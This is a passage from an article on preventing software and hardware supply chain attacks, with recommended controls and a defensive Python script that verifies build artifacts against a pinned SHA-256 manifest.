trusted partners outside the organization can now become the source of a data breach or worse still a malware injection.
This danger can be compounded if the target organization is a “supplier-of-suppliers” who happen to house sensitive
information about other suppliers on their systems. Like almost everything in the internet age, the danger growth curve is
exponential in nature.

PREVENTING CYBER ATTACKS

Besides the basic rule of thumb to always work to reduce the attack surface of an organization, a number of steps can be
taken both by manufacturers and suppliers to prevent attacks and harden system integrity.

• Supplier Security Standards and Policy: Manufacturers should hold the suppliers in their supply chain accountable by issuing the Cyber Security Standards or policies that suppliers must abide by to win business and orders from the manufacturer. Larger industry vendors may already follow such a regime with their customers, so for them it is only a matter of validating compliance, but smaller vendors will be challenged in this area by the additional staffing costs and skills needed to comply.

• Software Development Life Cycle Hardening: Suppliers should implement improved controls on the code delivery platforms that aggregate, compile, build and distribute software, to prevent malware injection and rootkit insertion into the customer deliverable. The recent SolarWinds debacle is just one of the most notable instances of an upgrade installer being compromised and affecting hundreds of customers. Ironically, one of the highest-profile companies compromised in that attack was FireEye, itself a notable cybersecurity provider. Other firms, such as Malwarebytes, were also targeted, together with behemoths like Microsoft.

[Figure omitted; courtesy securityaffairs.co]

• Secure Access and Privileges: Organizations should ensure that Suppliers’ Access and Privileges are regularly
reviewed and strengthened as part of the Annual Risk Assessment Cycle. Too often, organizations are engrossed in
their perimeter defenses looking both inwards and outwards without realizing that their most potent adversary may
be using the front door to enter their compound.

• Industry Security Certification: Manufacturers may demand that their suppliers work towards implementing a
recognized industry supply chain security certification standard such as ISO 28000. This may not be reasonable for
smaller outfits but the largest suppliers will have no trouble implementing the necessary framework and obtaining
the associated certification. Attackers will frequently seek out some of the smaller suppliers knowing full well that
they may not have the finances or expertise in-house to implement sophisticated controls necessary to thwart their
intrusion.

• Zero Trust Architecture (ZTA): When dealing with vendor interactions, customers should be prepared to adopt a Zero Trust Architecture (ZTA) approach. All network activity with the vendor must be treated as untrusted by default. Only after each connection request passes a strict set of policies is it permitted to reach the sensitive data and intellectual property within the customer's systems.

• Cyber Security Awareness Program: Manufacturers may require their suppliers to institute a meaningful in-house Cyber Security Awareness Program to educate their staff and all data-facing team members about the dangers of malicious attacks and the methods of recognizing a threat vector. Even the most administrative of roles, such as accounting, payroll, and HR, have access to some of the most sensitive data, yet are often oblivious to the simplest measures required to improve their security posture while being targeted continually by phishing e-mails. Awareness programs should not be treated as a panacea but as one more complementary tool in the armory for improving defenses, since too often humans present the most vulnerable interface for hackers.

• Open Source Software & Platforms: Vendors should regularly review the usage and suitability of the Open Source software they rely on, to ensure that the tools they take for granted have not been compromised and are not themselves distributing malware to their customers. Software build tools require particular attention here, as they are responsible for packaging the final executable that ships to the customer at large. According to Sonatype’s 2020 State of the Software Supply Chain Report, 90% of all apps use open-source code, and 11% of them have known vulnerabilities.

• Independent 3rd party Risk Assessments: Although we all try to abide by an honor system in our daily lives
and business transactions, this may not be the same when working with vendors. Rather than leaving this to chance,
manufacturers are encouraged to require vendors to allow access to Third Party Risk Assessments that generate
reports to be returned to the manufacturer to validate their trust. Vendors will rarely do this voluntarily so it’s up to
their customers to insist on these checks and balances being in place. Such third-party risk assessments will
demonstrate clearly to customers the security posture of vendors and if they need to improve their position further
or risk losing business because of it.

• Reduce Outsourcing: The globalization of manufacturing and services during the last three decades has led to a web of interdependencies that the COVID-19 pandemic and its associated restrictions have brought into sharp relief. This web has expanded the attack surface greatly, allowing hackers to focus on low-hanging fruit, such as poorly prepared and defended downstream supply chain vendors, and thereby gain backdoor access to some of the largest corporations and their systems through the supplied products. Compromised electronics and semiconductor products used within US military, government, and vital civilian platforms give foreign adversaries possible backdoors through which to attack those systems at will. This is especially concerning in the energy and power distribution industry, where many IoT devices are supplied from abroad.
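The "Software Development Life Cycle Hardening" and "Open Source Software & Platforms" points above share one concrete control: nothing enters the build, and nothing leaves it, unless its hash matches a pinned value recorded outside the build environment. The block below is an added example written for this article, not code from the article or from any of the vendors it mentions. It implements a fail-closed build-input gate over a manifest in the `sha256sum` convention (`<hex digest>  <filename>`), and its `demo()` function constructs a throwaway input directory containing a good artifact, an installer altered after the manifest was produced, an artifact that was pinned but never downloaded, and a file nobody pinned at all. The manifest is assumed to arrive over a trusted channel (for example, signed and verified before this step); that verification is outside this block.

```python
"""Build-input gate: every artifact fed to the build must match a pinned SHA-256.

Added example (not from the article). Manifest format is the sha256sum
convention, `<hex digest>  <filename>`, one entry per line. Unlike
`sha256sum -c`, this gate fails closed: an artifact that is present in the
input directory but not listed is an error, not something silently ignored.
Assumption: the manifest itself was obtained over a trusted channel.
"""
from __future__ import annotations
import hashlib
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

CHUNK = 1 << 16


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large installers do not hit memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            digest.update(chunk)
    return digest.hexdigest()


def parse_manifest(text: str) -> dict[str, str]:
    """Return {filename: expected_hex}. Rejects malformed or duplicate lines."""
    pinned: dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"manifest line {lineno}: malformed entry {raw!r}")
        digest, name = parts[0].lower(), parts[1].strip()
        if name in pinned:
            raise ValueError(f"manifest line {lineno}: duplicate entry for {name}")
        pinned[name] = digest
    return pinned


@dataclass
class Verdict:
    ok: list[str] = field(default_factory=list)
    mismatched: list[str] = field(default_factory=list)  # content changed
    missing: list[str] = field(default_factory=list)     # pinned, not present
    unlisted: list[str] = field(default_factory=list)    # present, not pinned

    @property
    def passed(self) -> bool:
        return not (self.mismatched or self.missing or self.unlisted)


def verify_inputs(manifest_text: str, input_dir: Path) -> Verdict:
    """Compare every file in input_dir against the manifest, both directions."""
    pinned = parse_manifest(manifest_text)
    verdict = Verdict()
    present = {p.name: p for p in input_dir.iterdir() if p.is_file()}
    for name, expected in pinned.items():
        path = present.pop(name, None)
        if path is None:
            verdict.missing.append(name)
        elif sha256_file(path) == expected:
            verdict.ok.append(name)
        else:
            verdict.mismatched.append(name)
    verdict.unlisted.extend(sorted(present))   # whatever the manifest never saw
    return verdict


def demo() -> Verdict:
    """Constructed scenario: one good artifact, one tampered installer, one
    pinned-but-absent archive, and one file smuggled into the input directory."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        library = b"legit vendor library v1.0\n"
        installer = b"upgrade installer v2.3\n"
        (d / "libvendor-1.0.tar.gz").write_bytes(library)
        # The installer on disk differs from what was pinned (one byte changed).
        (d / "installer-2.3.bin").write_bytes(installer.replace(b"2.3", b"2.4"))
        (d / "helper.so").write_bytes(b"nobody pinned me\n")
        manifest = (
            f"{hashlib.sha256(library).hexdigest()}  libvendor-1.0.tar.gz\n"
            f"{hashlib.sha256(installer).hexdigest()}  installer-2.3.bin\n"
            f"{'0' * 64}  docs-2.3.zip\n"      # pinned but never downloaded
        )
        return verify_inputs(manifest, d)


if __name__ == "__main__":
    v = demo()
    print("PASSED" if v.passed else "FAILED", v)
```

Wired into a CI job, `verify_inputs` runs before any compile step and the job aborts on `passed == False`; the same routine run over the output directory against a manifest produced on a separate, locked-down signing host catches the case SolarWinds illustrates, where the build itself is the thing that was tampered with.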

This list is by no means final or conclusive of all opportunities for improving the supply chain conundrum. At best, it
provides some minimum guidelines on areas that need to be addressed to reduce the attack surface.

CONCLUSION

For businesses, both large and small, all the reasons above, and probably some not listed, demonstrate how the threat landscape has changed now that building products and services relies on an advanced supply chain of trusted partners and 3rd party tools. The seaports in Los Angeles account for around 60% of all in-bound import merchandise and products arriving in the US, yet they have been backed up for months with a whole armada of container ships waiting to dock and unload. The COVID-19 pandemic has laid bare just how fragile our supply chain networks are, with shortages predicted in the near and long term. Car dealerships are flush with pre-owned models while the latest models float aimlessly in the holds of ships anchored at the Pacific ports, waiting their turn to unload. Manufacturers are unable to meet or ship orders due to chip shortages that may not recede for months to come. The supply chain is the oxygen of the world economy and needs to be protected if industry and the whole economic system are to survive.

References

1. Wikipedia, "Supply chain attack": https://en.wikipedia.org/wiki/Supply_chain_attack
2. UpGuard, "11 Ways to Prevent Supply Chain Attacks in 2021 (Highly Effective)": https://www.upguard.com/blog/how-to-prevent-supply-chain-attacks
3. Wired, "Hacker Lexicon: What Is a Supply Chain Attack?": https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/
4. Sonatype, "2020 State of the Software Supply Chain Report": https://www.sonatype.com/resources/white-paper-state-of-the-software-supply-chain-2020
